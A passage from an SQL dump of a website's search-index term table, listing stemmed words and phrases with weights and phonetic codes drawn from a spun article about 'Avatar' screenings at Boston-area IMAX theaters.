a',0,1,1.5333,'K516523',1,'en'),(22636,'known would','known would',0,1,1.3667,'K543',1,'en'),(22637,'known would recommend','known would recommend',0,1,1.7,'K5436253',1,'en'),(22638,'last one','last one',0,1,1.2667,'L235',1,'en'),(22639,'last one it','last one it',0,1,1.3667,'L2353',1,'en'),(22640,'legacy','legaci',0,0,0.4,'L200',1,'en'),(22641,'legacy place','legaci place',0,1,1.4,'L2142',1,'en'),(22642,'legacy place in','legaci place in',0,1,1.5,'L21425',1,'en'),(22643,'life on','life on',0,1,1.2333,'L150',1,'en'),(22644,'life on the','life on the',0,1,1.3667,'L153',1,'en'),(22645,'like boston','like boston',0,1,1.3667,'L21235',1,'en'),(22646,'like boston film','like boston film',0,1,1.5333,'L21235145',1,'en'),(22647,'look and','look and',0,1,1.2667,'L253',2,'en'),(22648,'look and feeling','look and feeling',0,1,1.5333,'L2531452',1,'en'),(22649,'lot of like','lot of like',0,1,1.3667,'L3142',1,'en'),(22650,'lux','lux',0,0,0.2,'L200',1,'en'),(22651,'lux legacy','lux legacy',0,1,1.3333,'L242',1,'en'),(22652,'lux legacy place','lux legacy place',0,1,1.5333,'L242142',1,'en'),(22653,'lux patriot','lux patriot',0,1,1.3667,'L21363',1,'en'),(22654,'lux patriot place','lux patriot place',0,1,1.5667,'L21363142',1,'en'),(22655,'made and','made and',0,1,1.2667,'M353',1,'en'),(22656,'made and positioned','made and positioned',0,1,1.6333,'M35312353',1,'en'),(22657,'make you','make you',0,1,1.2667,'M200',1,'en'),(22658,'make you would','make you would',0,1,1.4667,'M243',1,'en'),(22659,'marine','marin',0,0,0.4,'M650',1,'en'),(22660,'marine who','marin who',0,1,1.3333,'M650',1,'en'),(22661,'marine who cheap','marin who cheap',0,1,1.5333,'M6521',1,'en'),(22662,'marine who starts','marin who starts',0,1,1.5667,'M6523632',1,'en'),(22663,'maximize','maxim',0,0,0.5333,'M252',1,'en'),(22664,'maximize each','maxim each',0,1,1.4333,'M252',1,'en'),(22665,'maximize each audience','maxim each audience',0,1,1.7333,'M252352',1,'en'),(22666,'member','member',0,0,0.4,'M160',2,'en'),(22667,'member field','member field',0,1,1.4,'M16143',1,'en'),(22668,'member field of','member field of',0,1,1.5,'M161431',1,'en'),(22669,'million','million',0,0,0.4667,'M450',4,'en'),(22670,'million to','million to',0,1,1.3333,'M453',1,'en'),(22671,'million to make','million to make',0,1,1.5,'M45352',1,'en'),(22672,'morning most','morn most',0,1,1.4,'M652523',1,'en'),(22673,'morning most friday','morn most friday',0,1,1.6333,'M652523163',1,'en'),(22674,'most current','most current',0,1,1.4,'M232653',1,'en'),(22675,'most current big','most current big',0,1,1.5333,'M23265312',1,'en'),(22676,'most friday','most friday',0,1,1.3667,'M23163',1,'en'),(22677,'most friday evening','most friday evening',0,1,1.6333,'M23163152',1,'en'),(22678,'most up-to-date','most up-to-date',0,1,1.5,'M2313',1,'en'),(22679,'most up-to-date big','most up-to-date big',0,1,1.6333,'M231312',1,'en'),(22680,'movie','movi',0,0,0.3333,'M100',2,'en'),(22681,'movie avatar','movi avatar',0,1,1.4,'M136',1,'en'),(22682,'movie avatar is','movi avatar is',0,1,1.5,'M1362',1,'en'),(22683,'movie symkus','movi symkus',0,1,1.4,'M1252',1,'en'),(22684,'movie symkus cited','movi symkus cited',0,1,1.6,'M12523',1,'en'),(22685,'movie symkus known','movi symkus known',0,1,1.6,'M12525',1,'en'),(22686,'na','na',0,0,0.1333,'N000',1,'en'),(22687,'na race','na race',0,1,1.2333,'N620',1,'en'),(22688,'na race 2.it','na race 2.it',0,1,1.4,'N623',1,'en'),(22689,'natick','natick',0,0,0.4,'N320',1,'en'),(22690,'natick 5.a','natick 5.a',0,1,1.3333,'N320',1,'en'),(22691,'natick 5.a lot','natick 5.a lot',0,1,1.4667,'N3243',1,'en'),(22692,'natick 5.many','natick 5.many',0,1,1.4333,'N325',1,'en'),(22693,'natick 5.many people','natick 5.many people',0,1,1.6667,'N32514',1,'en'),(22694,'natick or','natick or',0,1,1.3,'N326',1,'en'),(22695,'natick or reading','natick or reading',0,1,1.5667,'N326352',1,'en'),(22696,'nation showing','nation showing',0,1,1.4667,'N35252',1,'en'),(22697,'nation showing the','nation showing the',0,1,1.6,'N352523',1,'en'),(22698,'national amusements','nation amusements',0,1,1.6333,'N35452532',1,'en'),(22699,'national amusements showcase','nation amusements showcase',0,1,1.9333,'N35452532',1,'en'),(22700,'need to understand','need to understand',0,1,1.6,'N35362353',1,'en'),(22701,'new ambiance','new ambiance',0,1,1.4,'N152',1,'en'),(22702,'new ambiance to','new ambiance to',0,1,1.5,'N1523',1,'en'),(22703,'new life','new life',0,1,1.2667,'N410',1,'en'),(22704,'new life on','new life on',0,1,1.3667,'N415',1,'en'),(22705,'new overall','new overall',0,1,1.3667,'N164',1,'en'),(22706,'new overall look','new overall look',0,1,1.5333,'N1642',1,'en'),(22707,'now twice','now twice',0,1,1.3,'N320',1,'en'),(22708,'now twice ok','now twice ok',0,1,1.4,'N320',1,'en'),(22709,'of and','of and',0,1,1.2,'O153',1,'en'),(22710,'of and fame','of and fame',0,1,1.3667,'O15315',1,'en'),(22711,'of like','of like',0,1,1.2333,'O142',1,'en'),(22712,'of like boston','of like boston',0,1,1.4667,'O1421235',1,'en'),(22713,'of pandora','of pandora',0,1,1.3333,'O1536',1,'en'),(22714,'of pandora find','of pandora find',0,1,1.5,'O1536153',1,'en'),(22715,'of pandora realize','of pandora realize',0,1,1.6,'O153642',1,'en'),(22716,'of the sci','of the sci',0,1,1.3333,'O132',1,'en'),(22717,'of this movie','of this movie',0,1,1.4333,'O13251',1,'en'),(22718,'of view','of view',0,1,1.2333,'O100',1,'en'),(22719,'of view putting','of view putting',0,1,1.5,'O1352',1,'en'),(22720,'off cinema','off cinema',0,1,1.3333,'O125',1,'en'),(22721,'off cinema de','off cinema de',0,1,1.4333,'O1253',1,'en'),(22722,'ok','ok',0,0,0.1333,'O200',2,'en'),(22723,'ok last','ok last',0,1,1.2333,'O2423',1,'en'),(22724,'ok last one','ok last one',0,1,1.3667,'O24235',1,'en'),(22725,'on the distant','on the distant',0,1,1.4667,'O532353',1,'en'),(22726,'on the film','on the film',0,1,1.3667,'O53145',1,'en'),(22727,'on the imax','on the imax',0,1,1.3667,'O5352',1,'en'),(22728,'one it','on it',0,1,1.2,'O530',1,'en'),(22729,'one it proficient','on it proficient',0,1,1.5667,'O53161253',1,'en'),(22730,'one it wonderful','on it wonderful',0,1,1.5333,'O5353614',1,'en'),(22731,'or perhaps','or perhaps',0,1,1.3333,'O61612',3,'en'),(22732,'or perhaps imax','or perhaps imax',0,1,1.5,'O6161252',1,'en'),(22733,'or reading','or reading',0,1,1.3333,'O6352',1,'en'),(22734,'or reading from','or reading from',0,1,1.5,'O6352165',1,'en'),(22735,'or reading how','or reading how',0,1,1.4667,'O6352',1,'en'),(22736,'out concerts','out concerts',0,1,1.4,'O3252632',1,'en'),(22737,'out concerts at','out concerts at',0,1,1.5,'O32526323',1,'en'),(22738,'out himself','out himself',0,1,1.3667,'O35241',1,'en'),(22739,'out himself battling','out himself battling',0,1,1.6667,'O352413452',1,'en'),(22740,'over a','over a',0,1,1.2,'O160',1,'en'),(22741,'over a decade','over a decade',0,1,1.4333,'O16323',1,'en'),(22742,'overall','overal',0,0,0.4667,'O164',4,'en'),(22743,'overall look','overal look',0,1,1.4,'O1642',1,'en'),(22744,'overall look and','overal look and',0,1,1.5333,'O164253',1,'en'),(22745,'pages 6','page 6',0,1,1.2333,'P200',1,'en'),(22746,'pandora bracelets starts','pandora bracelets starts',0,1,1.8,'P5361624323632',1,'en'),(22747,'pandora charms','pandora charms',0,1,1.4667,'P5362652',4,'en'),(22748,'pandora charms canada','pandora charms canada',0,1,1.7,'P536265253',4,'en'),(22749,'pandora find','pandora find',0,1,1.4,'P536153',1,'en'),(22750,'pandora find out','pandora find out',0,1,1.5333,'P536153',1,'en'),(22751,'pandora realize','pandora realize',0,1,1.5,'P53642',1,'en'),(22752,'pandora realize himself','pandora realize himself',0,1,1.7667,'P536425241',1,'en'),(22753,'paraplegic','parapleg',0,0,0.6667,'P6142',1,'en'),(22754,'paraplegic ex','parapleg ex',0,1,1.4333,'P6142',1,'en'),(22755,'paraplegic ex marine','parapleg ex marine',0,1,1.6667,'P6142565',1,'en'),(22756,'patriot','patriot',0,0,0.4667,'P363',1,'en'),(22757,'patriot place','patriot place',0,1,1.4333,'P363142',1,'en'),(22758,'patriot place in','patriot place in',0,1,1.5333,'P3631425',1,'en'),(22759,'people like','peopl like',0,1,1.3667,'P420',1,'en'),(22760,'people like boston','peopl like boston',0,1,1.6,'P421235',1,'en'),(22761,'perhaps imax','perhap imax',0,1,1.4,'P61252',1,'en'),(22762,'perhaps imax 3d','perhap imax 3d',0,1,1.5,'P612523',1,'en'),(22763,'perhaps the','perhap the',0,1,1.3667,'P6123',1,'en'),(22764,'perhaps the sci','perhap the sci',0,1,1.5,'P61232',1,'en'),(22765,'place in','place in',0,1,1.2667,'P425',2,'en'),(22766,'place in dedham','place in dedham',0,1,1.5,'P42535',1,'en'),(22767,'place in foxboro','place in foxboro',0,1,1.5333,'P4251216',1,'en'),(22768,'planet','planet',0,0,0.4,'P453',1,'en'),(22769,'planet indigenous','planet indigenous',0,1,1.5667,'P45353252',1,'en'),(22770,'planet indigenous na','planet indigenous na',0,1,1.6667,'P453532525',1,'en'),(22771,'planet of','planet of',0,1,1.3,'P4531',1,'en'),(22772,'planet of pandora','planet of pandora',0,1,1.5667,'P4531536',1,'en'),(22773,'plans','plan',0,0,0.3333,'P452',2,'en'),(22774,'plans to','plan to',0,1,1.2667,'P4523',1,'en'),(22775,'plans to go','plan to go',0,1,1.3667,'P45232',1,'en'),(22776,'positioned','posit',0,0,0.6667,'P2353',1,'en'),(22777,'positioned to','posit to',0,1,1.4333,'P2353',1,'en'),(22778,'positioned to maximize','posit to maximize',0,1,1.7333,'P23535252',1,'en'),(22779,'previously','previous',0,0,0.6667,'P6124',1,'en'),(22780,'previously seen','previous seen',0,1,1.5,'P612425',1,'en'),(22781,'previously seen the','previous seen the',0,1,1.6333,'P6124253',1,'en'),(22782,'pricey','pricei',0,0,0.4,'P620',2,'en'),(22783,'pricey and','pricei and',0,1,1.3333,'P6253',1,'en'),(22784,'pricey and spectacular','pricei and spectacular',0,1,1.7333,'P62532123246',1,'en'),(22785,'production','product',0,0,0.6667,'P63235',3,'en'),(22786,'production company','product company',0,1,1.6,'P632352515',2,'en'),(22787,'production company based','product company based',0,1,1.8,'P632352515123',1,'en'),(22788,'proficient','profici',0,0,0.6667,'P61253',1,'en'),(22789,'proficient he','profici he',0,1,1.4333,'P61253',1,'en'),(22790,'proficient he was','profici he was',0,1,1.5667,'P612532',1,'en'),(22791,'promised','promis',0,0,0.5333,'P6523',1,'en'),(22792,'promised a','promis a',0,1,1.3333,'P6523',1,'en'),(22793,'promised a whole','promis a whole',0,1,1.5333,'P65234',1,'en'),(22794,'putting','put',0,0,0.4667,'P352',2,'en'),(22795,'putting you','put you',0,1,1.3667,'P352',1,'en'),(22796,'putting you in','put you in',0,1,1.4667,'P3525',1,'en'),(22797,'quoted','quot',0,0,0.4,'Q300',2,'en'),(22798,'quoted saying','quot saying',0,1,1.4333,'Q3252',2,'en'),(22799,'quoted saying director','quot saying director',0,1,1.7333,'Q325236236',1,'en'),(22800,'race','race',0,0,0.2667,'R200',2,'en'),(22801,'race 2.it','race 2.it',0,1,1.3,'R230',1,'en'),(22802,'race 2.it most','race 2.it most',0,1,1.4667,'R23523',1,'en'),(22803,'randolph','randolph',0,0,0.5333,'R5341',1,'en'),(22804,'randolph amc','randolph amc',0,1,1.4,'R534152',1,'en'),(22805,'randolph amc cinemas','randolph amc cinemas',0,1,1.6667,'R53415252',1,'en'),(22806,'reading from','read from',0,1,1.4,'R352165',1,'en'),(22807,'reading from the','read from the',0,1,1.5333,'R3521653',1,'en'),(22808,'reading how','read how',0,1,1.3667,'R352',1,'en'),(22809,'reading how the','read how the',0,1,1.5,'R3523',1,'en'),(22810,'realize','realiz',0,0,0.4667,'R420',2,'en'),(22811,'realize himself','realiz himself',0,1,1.5,'R425241',1,'en'),(22812,'realize himself battling','realiz himself battling',0,1,1.8,'R4252413452',1,'en'),(22813,'really scores','realli scores',0,1,1.4333,'R4262',1,'en'),(22814,'really scores of','realli scores of',0,1,1.5333,'R42621',1,'en'),(22815,'really scores utilizing','realli scores utilizing',0,1,1.7667,'R426234252',1,'en'),(22816,'recommend','recommend',0,0,0.6,'R253',1,'en'),(22817,'recommend it','recommend it',0,1,1.4,'R253',1,'en'),(22818,'recommend it in','recommend it in',0,1,1.5,'R2535',1,'en'),(22819,'regarding','regard',0,0,0.6,'R26352',3,'en'),(22820,'regarding his','regard his',0,1,1.4333,'R26352',1,'en'),(22821,'regarding his wife','regard his wife',0,1,1.6,'R263521',1,'en'),(22822,'reviews','review',0,0,0.4667,'R120',2,'en'),(22823,'reviews from','review from',0,1,1.4,'R12165',1,'en'),(22824,'reviews from film','review from film',0,1,1.5667,'R12165145',1,'en'),(22825,'romance','romanc',0,0,0.4667,'R520',1,'en'),(22826,'romance and','romanc and',0,1,1.3667,'R5253',1,'en'),(22827,'romance and exotic','romanc and exotic',0,1,1.6,'R5253232',1,'en'),(22828,'saying','sai',0,0,0.4,'S520',2,'en'),(22829,'saying director','sai director',0,1,1.5,'S5236236',1,'en'),(22830,'saying director cameron','sai director cameron',0,1,1.7667,'S52362362565',1,'en'),(22831,'says he plans','sai he plans',0,1,1.4333,'S1452',1,'en'),(22832,'sci','sci',0,0,0.2,'S000',1,'en'),(22833,'sci fi','sci fi',0,1,1.2,'S100',1,'en'),(22834,'sci fi epic','sci fi epic',0,1,1.3667,'S120',1,'en'),(22835,'scores','score',0,0,0.4,'S620',1,'en'),(22836,'scores of','score of',0,1,1.3,'S621',1,'en'),(22837,'scores of this','score of this',0,1,1.4667,'S62132',1,'en'),(22838,'scores utilizing','score utilizing',0,1,1.5333,'S6234252',1,'en'),(22839,'scores utilizing movie','score utilizing movie',0,1,1.7333,'S623425251',1,'en'),(22840,'screens are','screen are',0,1,1.3667,'S6526',1,'en'),(22841,'screens are and','screen are and',0,1,1.5,'S652653',1,'en'),(22842,'screens are made','screen are made',0,1,1.5333,'S652653',1,'en'),(22843,'see \'avatar\'','see avatar',0,1,1.4,'S136',1,'en'),(22844,'see \'avatar\' the','see avatar the',0,1,1.5333,'S1363',1,'en'),(22845,'see it','see it',0,1,1.2,'S300',1,'en'),(22846,'see it 1.light','see it 1.light',0,1,1.4667,'S3423',1,'en'),(22847,'see it 1.rare','see it 1.rare',0,1,1.4333,'S360',1,'en'),(22848,'see it in','see it in',0,1,1.3,'S350',1,'en'),(22849,'see some','see some',0,1,1.2667,'S500',1,'en'),(22850,'see some pricey','see some pricey',0,1,1.5,'S5162',1,'en'),(22851,'seen it','seen it',0,1,1.2333,'S530',1,'en'),(22852,'seen it in','seen it in',0,1,1.3333,'S535',1,'en'),(22853,'seen the','seen the',0,1,1.2667,'S530',1,'en'),(22854,'seen the film','seen the film',0,1,1.4333,'S53145',1,'en'),(22855,'settings','set',0,0,0.5333,'S352',2,'en'),(22856,'settings are','set are',0,1,1.4,'S3526',1,'en'),(22857,'settings are all','set are all',0,1,1.5333,'S35264',1,'en'),(22858,'should go','should go',0,1,1.3,'S432',1,'en'),(22859,'should go to','should go to',0,1,1.4,'S4323',1,'en'),(22860,'show cinema','show cinema',0,1,1.3667,'S500',1,'en'),(22861,'show cinema de','show cinema de',0,1,1.4667,'S530',1,'en'),(22862,'show off cinema','show off cinema',0,1,1.5,'S125',1,'en'),(22863,'showcase','showcas',0,0,0.5333,'S000',1,'en'),(22864,'showcase cinemas','showcas cinemas',0,1,1.5333,'S520',1,'en'),(22865,'showcase cinemas in','showcas cinemas in',0,1,1.6333,'S525',1,'en'),(22866,'showing','show',0,0,0.4667,'S520',1,'en'),(22867,'showing the','show the',0,1,1.3667,'S523',1,'en'),(22868,'showing the film','show the film',0,1,1.5333,'S523145',1,'en'),(22869,'shown','shown',0,0,0.3333,'S500',2,'en'),(22870,'shown at','shown at',0,1,1.2667,'S530',1,'en'),(22871,'shown at verizon','shown at verizon',0,1,1.5333,'S531625',1,'en'),(22872,'shown promised','shown promised',0,1,1.4667,'S516523',1,'en'),(22873,'shown promised a','shown promised a',0,1,1.5333,'S516523',1,'en'),(22874,'shows','show',0,0,0.3333,'S000',2,'en'),(22875,'shows were','show were',0,1,1.3333,'S600',1,'en'),(22876,'shows were had','show were had',0,1,1.4667,'S630',1,'en'),(22877,'shows were soldout','show were soldout',0,1,1.6,'S6243',1,'en'),(22878,'since the','sinc the',0,1,1.3,'S523',3,'en'),(22879,'since the film','sinc the film',0,1,1.4667,'S523145',1,'en'),(22880,'skinned','skin',0,0,0.4667,'S530',1,'en'),(22881,'skinned aliens','skin aliens',0,1,1.4667,'S53452',1,'en'),(22882,'skinned aliens within','skin aliens within',0,1,1.7,'S5345235',1,'en'),(22883,'sold','sold',0,0,0.2667,'S430',2,'en'),(22884,'sold out','sold out',0,1,1.2667,'S430',1,'en'),(22885,'sold out concerts','sold out concerts',0,1,1.5667,'S43252632',1,'en'),(22886,'soldout','soldout',0,0,0.4667,'S430',1,'en'),(22887,'soldout at','soldout at',0,1,1.3333,'S430',1,'en'),(22888,'soldout at the','soldout at the',0,1,1.4667,'S430',1,'en'),(22889,'some pricey','some pricey',0,1,1.3667,'S5162',1,'en'),(22890,'some pricey and','some pricey and',0,1,1.5,'S516253',1,'en'),(22891,'special effects','special effects',0,1,1.5,'S1241232',1,'en'),(22892,'special effects the','special effects the',0,1,1.6333,'S12412323',1,'en'),(22893,'spectacular','spectacular',0,0,0.7333,'S123246',1,'en'),(22894,'spectacular special','spectacular special',0,1,1.6333,'S1232462124',1,'en'),(22895,'spectacular special effects','spectacular special effects',0,1,1.9,'S12324621241232',1,'en'),(22896,'spot','spot',0,0,0.2667,'S130',1,'en'),(22897,'spot while','spot while',0,1,1.3333,'S134',1,'en'),(22898,'spot while the','spot while the',0,1,1.4667,'S1343',1,'en'),(22899,'starts a','start a',0,1,1.2667,'S3632',1,'en'),(22900,'starts a new','start a new',0,1,1.4,'S36325',1,'en'),(22901,'symkus','symku',0,0,0.4,'S520',1,'en'),(22902,'symkus cited','symku cited',0,1,1.4,'S523',1,'en'),(22903,'symkus cited will','symku cited will',0,1,1.5667,'S5234',1,'en'),(22904,'symkus formerly','symku formerly',0,1,1.5,'S5216564',1,'en'),(22905,'symkus formerly seen','symku formerly seen',0,1,1.6667,'S521656425',1,'en'),(22906,'symkus known','symku known',0,1,1.4,'S525',1,'en'),(22907,'symkus known would','symku known would',0,1,1.6,'S52543',1,'en'),(22908,'symkus previously','symku previously',0,1,1.5667,'S5216124',1,'en'),(22909,'symkus previously seen','symku previously seen',0,1,1.7333,'S521612425',1,'en'),(22910,'symkus says','symku says',0,1,1.3667,'S520',1,'en'),(22911,'symkus says he','symku says he',0,1,1.4667,'S520',1,'en'),(22912,'symkus shown','symku shown',0,1,1.4,'S525',1,'en'),(22913,'symkus shown promised','symku shown promised',0,1,1.7,'S52516523',1,'en'),(22914,'the armed','the armed',0,1,1.3,'T653',1,'en'),(22915,'the armed forces','the armed forces',0,1,1.5333,'T653162',1,'en'),(22916,'the big','the big',0,1,1.2333,'T120',2,'en'),(22917,'the big budget','the big budget',0,1,1.4667,'T121323',1,'en'),(22918,'the distant','the distant',0,1,1.3667,'T2353',1,'en'),(22919,'the distant planet','the distant planet',0,1,1.6,'T23531453',1,'en'),(22920,'the film','the film',0,1,1.2667,'T145',1,'en'),(22921,'the film cost','the film cost',0,1,1.4333,'T14523',1,'en'),(22922,'the film for','the film for',0,1,1.4,'T14516',1,'en'),(22923,'the film has','the film has',0,1,1.4,'T1452',1,'en'),(22924,'the film in','the film in',0,1,1.3667,'T145',1,'en'),(22925,'the film is','the film is',0,1,1.3667,'T1452',1,'en'),(22926,'the film twice','the film twice',0,1,1.4667,'T14532',1,'en'),(22927,'the imax','the imax',0,1,1.2667,'T520',1,'en'),(22928,'the imax corp','the imax corp',0,1,1.4333,'T5261',1,'en'),(22929,'the imax theater','the imax theater',0,1,1.5333,'T5236',1,'en'),(22930,'the movie','the movie',0,1,1.3,'T510',1,'en'),(22931,'the movie avatar','the movie avatar',0,1,1.5333,'T5136',1,'en'),(22932,'the nation','the nation',0,1,1.3333,'T535',2,'en'),(22933,'the nation showing','the nation showing',0,1,1.6,'T535252',1,'en'),(22934,'the planet','the planet',0,1,1.3333,'T1453',1,'en'),(22935,'the planet indigenous','the planet indigenous',0,1,1.7,'T145353252',1,'en'),(22936,'the sci','the sci',0,1,1.2333,'T200',1,'en'),(22937,'the sci fi','the sci fi',0,1,1.3333,'T210',1,'en'),(22938,'the spot','the spot',0,1,1.2667,'T213',1,'en'),(22939,'the spot while','the spot while',0,1,1.4667,'T2134',1,'en'),(22940,'theater','theater',0,0,0.4667,'T600',1,'en'),(22941,'theater at','theater at',0,1,1.3333,'T630',1,'en'),(22942,'theater at jordan','theater at jordan',0,1,1.5667,'T632635',1,'en'),(22943,'theater in','theater in',0,1,1.3333,'T650',1,'en'),(22944,'theater in natick','theater in natick',0,1,1.5667,'T6532',1,'en'),(22945,'theatres','theatr',0,0,0.5333,'T620',1,'en'),(22946,'theatres across','theatr across',0,1,1.5,'T6262',1,'en'),(22947,'theatres across the','theatr across the',0,1,1.6333,'T62623',1,'en'),(22948,'things to','thing to',0,1,1.3,'T523',2,'en'),(22949,'things to know','thing to know',0,1,1.4667,'T52325',1,'en'),(22950,'third time','third time',0,1,1.3333,'T635',2,'en'),(22951,'third time along','third time along',0,1,1.5333,'T635452',1,'en'),(22952,'third time together','third time together',0,1,1.6333,'T6353236',1,'en'),(22953,'this film','thi film',0,1,1.3,'T2145',1,'en'),(22954,'this film and','thi film and',0,1,1.4333,'T21453',1,'en'),(22955,'this movie','thi movie',0,1,1.3333,'T251',1,'en'),(22956,'this movie symkus','thi movie symkus',0,1,1.5667,'T251252',1,'en'),(22957,'three different','three different',0,1,1.5,'T631653',1,'en'),(22958,'three different formats','three different formats',0,1,1.7667,'T63165316532',1,'en'),(22959,'thursday','thursdai',0,0,0.5333,'T623',2,'en'),(22960,'thursday evening','thursdai evening',0,1,1.5333,'T623152',1,'en'),(22961,'thursday evening most','thursdai evening most',0,1,1.7,'T623152523',1,'en'),(22962,'thursday morning','thursdai morning',0,1,1.5333,'T6235652',1,'en'),(22963,'thursday morning most','thursdai morning most',0,1,1.7,'T6235652523',1,'en'),(22964,'time along','time along',0,1,1.3333,'T5452',1,'en'),(22965,'time along with','time along with',0,1,1.5,'T54523',1,'en'),(22966,'time together','time together',0,1,1.4333,'T53236',1,'en'),(22967,'time together along','time together along',0,1,1.6333,'T53236452',1,'en'),(22968,'to cinema','to cinema',0,1,1.3,'T250',1,'en'),(22969,'to cinema with','to cinema with',0,1,1.4667,'T253',1,'en'),(22970,'to either','to either',0,1,1.3,'T600',1,'en'),(22971,'to either natick','to either natick',0,1,1.5333,'T6532',1,'en'),(22972,'to go','to go',0,1,1.1667,'T200',3,'en'),(22973,'to go a','to go a',0,1,1.2333,'T200',1,'en'),(22974,'to know','to know',0,1,1.2333,'T250',1,'en'),(22975,'to know before','to know before',0,1,1.4667,'T2516',1,'en'),(22976,'to know for','to know for',0,1,1.3667,'T2516',1,'en'),(22977,'to make','to make',0,1,1.2333,'T520',4,'en'),(22978,'to make you','to make you',0,1,1.3667,'T520',1,'en'),(22979,'to maximize','to maximize',0,1,1.3667,'T5252',1,'en'),(22980,'to maximize each','to maximize each',0,1,1.5333,'T5252',1,'en'),(22981,'to see','to see',0,1,1.2,'T200',2,'en'),(22982,'to see \'avatar\'','to see avatar',0,1,1.5,'T2136',1,'en'),(22983,'to see it','to see it',0,1,1.3,'T230',1,'en'),(22984,'to understand','to understand',0,1,1.4333,'T5362353',1,'en'),(22985,'to understand before','to understand before',0,1,1.6667,'T536235316',1,'en'),(22986,'together','togeth',0,0,0.5333,'T236',4,'en'),(22987,'together along','togeth along',0,1,1.4667,'T236452',1,'en'),(22988,'together along regarding','togeth along regarding',0,1,1.8,'T236452626352',1,'en'),(22989,'twice and','twice and',0,1,1.3,'T253',1,'en'),(22990,'twice and symkus','twice and symkus',0,1,1.5333,'T253252',1,'en'),(22991,'twice ok','twice ok',0,1,1.2667,'T200',1,'en'),(22992,'twice ok last','twice ok last',0,1,1.4333,'T2423',1,'en'),(22993,'understand','understand',0,0,0.6667,'U5362353',1,'en'),(22994,'understand before','understand before',0,1,1.5667,'U536235316',1,'en'),(22995,'understand before you','understand before you',0,1,1.7,'U536235316',1,'en'),(22996,'understand the','understand the',0,1,1.4667,'U5362353',1,'en'),(22997,'understand the film','understand the film',0,1,1.6333,'U5362353145',1,'en'),(22998,'up-to-date','up-to-dat',0,0,0.6667,'U130',1,'en'),(22999,'up-to-date big','up-to-dat big',0,1,1.4667,'U1312',1,'en'),(23000,'up-to-date big budget','up-to-dat big budget',0,1,1.7,'U13121323',1,'en'),(23001,'utilizing','util',0,0,0.6,'U34252',2,'en'),(23002,'utilizing movie','util movie',0,1,1.5,'U3425251',1,'en'),(23003,'utilizing movie symkus','util movie symkus',0,1,1.7333,'U3425251252',1,'en'),(23004,'verizon','verizon',0,0,0.4667,'V625',1,'en'),(23005,'verizon imax','verizon imax',0,1,1.4,'V6252',1,'en'),(23006,'verizon imax 3d','verizon imax 3d',0,1,1.5,'V62523',1,'en'),(23007,'view putting','view putting',0,1,1.4,'V352',1,'en'),(23008,'view putting you','view putting you',0,1,1.5333,'V352',1,'en'),(23009,'was quoted','wa quoted',0,1,1.3333,'W230',2,'en'),(23010,'was quoted saying','wa quoted saying',0,1,1.5667,'W23252',2,'en'),(23011,'weekend shows','weekend shows',0,1,1.4333,'W2532',1,'en'),(23012,'weekend shows were','weekend shows were',0,1,1.6,'W25326',1,'en'),(23013,'were had','were had',0,1,1.2667,'W630',1,'en'),(23014,'were had sold','were had sold',0,1,1.4333,'W63243',1,'en'),(23015,'were soldout','were soldout',0,1,1.4,'W6243',1,'en'),(23016,'were soldout at','were soldout at',0,1,1.5,'W6243',1,'en'),(23017,'what you','what you',0,1,1.2667,'W300',2,'en'),(23018,'what you have','what you have',0,1,1.4333,'W310',1,'en'),(23019,'what you need','what you need',0,1,1.4333,'W353',1,'en'),(23020,'while the film','while the film',0,1,1.4667,'W43145',1,'en'),(23021,'who cheap','who cheap',0,1,1.3,'W210',1,'en'),(23022,'who cheap pandora','who cheap pandora',0,1,1.5667,'W21536',1,'en'),(23023,'who starts','who starts',0,1,1.3333,'W23632',1,'en'),(23024,'who starts a','who starts a',0,1,1.4,'W23632',1,'en'),(23025,'whole','whole',0,0,0.3333,'W400',3,'en'),(23026,'whole new','whole new',0,1,1.3,'W450',1,'en'),(23027,'whole new ambiance','whole new ambiance',0,1,1.6,'W45152',1,'en'),(23028,'whole new overall','whole new overall',0,1,1.5667,'W45164',1,'en'),(23029,'wife seen','wife seen',0,1,1.3,'W125',1,'en'),(23030,'wife seen it','wife seen it',0,1,1.4,'W1253',1,'en'),(23031,'will recommend','will recommend',0,1,1.4667,'W46253',1,'en'),(23032,'will recommend it','will recommend it',0,1,1.5667,'W46253',1,'en'),(23033,'with this','with this',0,1,1.3,'W320',2,'en'),(23034,'with this film','with this film',0,1,1.4667,'W32145',1,'en'),(23035,'with wife','with wife',0,1,1.3,'W310',1,'en'),(23036,'with wife seen','with wife seen',0,1,1.4667,'W3125',1,'en'),(23037,'within the armed','within the armed',0,1,1.5333,'W353653',1,'en'),(23038,'wonderful he','wonder he',0,1,1.4,'W53614',1,'en'),(23039,'wonderful he explained','wonder he explained',0,1,1.7333,'W5361421453',1,'en'),(23040,'working on','work on',0,1,1.3333,'W62525',1,'en'),(23041,'working on the','work on the',0,1,1.4667,'W625253',1,'en'),(23042,'would go','would go',0,1,1.2667,'W432',2,'en'),(23043,'would go to','would go to',0,1,1.3667,'W4323',1,'en'),(23044,'would recommend','would recommend',0,1,1.5,'W436253',1,'en'),(23045,'would recommend it','would recommend it',0,1,1.6,'W436253',1,'en'),(23046,'would see','would see',0,1,1.3,'W432',1,'en'),(23047,'would see some','would see some',0,1,1.4667,'W4325',1,'en'),(23048,'yellow','yellow',0,0,0.4,'Y400',1,'en'),(23049,'yellow skinned','yellow skinned',0,1,1.4667,'Y4253',1,'en'),(23050,'yellow skinned aliens','yellow skinned aliens',0,1,1.7,'Y4253452',1,'en'),(23051,'you have to','you have to',0,1,1.3667,'Y130',1,'en'),(23052,'you in','you in',0,1,1.2,'Y500',1,'en'),(23053,'you in film','you in film',0,1,1.3667,'Y5145',1,'en'),(23054,'you need','you need',0,1,1.2667,'Y530',3,'en'),(23055,'you need to','you need to',0,1,1.3667,'Y530',2,'en'),(23056,'you see it','you see it',0,1,1.3333,'Y230',1,'en'),(23057,'you should go','you should go',0,1,1.4333,'Y2432',1,'en'),(23058,'you to see','you to see',0,1,1.3333,'Y320',1,'en'),(23059,'you would go','you would go',0,1,1.4,'Y432',1,'en'),(23060,'you would see','you would see',0,1,1.4333,'Y432',1,'en'),(23061,'your goal','your goal',0,1,1.3,'Y624',1,'en'),(23062,'your goal is','your goal is',0,1,1.4,'Y6242',1,'en'),(23087,'a few','a few',0,1,1.1667,'A100',2,'en'),(23091,'a high','a high',0,1,1.2,'A200',1,'en'),(23115,'abilities','abil',0,0,0.6,'A1432',1,'en'),(23127,'add','add',0,0,0.2,'A300',3,'en'),(23130,'adding','ad',0,0,0.4,'A352',3,'en'),(23138,'always','alwai',0,0,0.4,'A420',1,'en'),(23162,'and there','and there',0,1,1.3,'A536',1,'en'),(23171,'are not','ar 